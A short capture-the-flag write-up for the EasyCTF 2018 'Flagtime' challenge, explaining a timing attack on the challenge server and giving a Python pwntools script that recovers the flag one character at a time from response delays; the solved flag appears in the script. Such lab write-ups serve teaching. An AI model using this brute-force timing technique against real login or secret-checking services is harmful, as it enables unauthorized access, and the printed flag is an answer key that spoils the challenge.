EASYCTF - Flagtime

21 Feb 2018

This problem is so easy, it can be solved in a matter of seconds. Connect to c1.easyctf.com:12482.

This was a simple timing attack on the service c1.easyctf.com:12482. However extracting the 26 characters took a really long time… The first delay was 1 second and then was incremented by 1 for every correct characters, when you’re trying to get the last characters it took around 25 seconds a try :(

#!/usr/bin/python
# -*- coding: utf-8 -*-
from pwn import *
import time

flag      = "easyctf{ez_t1m1ng_4ttack!}"
max_time  = 27

while True:
    for c in "!?}_15scktemng4afbsydh5ij37lopqruvwx02689z-@{":
        p = remote("c1.easyctf.com", 12482)
        p.recv()

        before = time.time()
        p.sendline(flag+c)
        p.recv()
        p.close()

        after = time.time()
        if after-before > max_time:
            max_time = max_time+1
            print max_time
            flag = flag+c
            break

    print flag

CTF Shell Club

EASYCTF - Flagtime

Related Posts

ECSC 2019 - leHack - harmless 06 Jul 2019

ECSC 2019 - qrcode 13 May 2019

ECSC 2019 - The Pytector 13 May 2019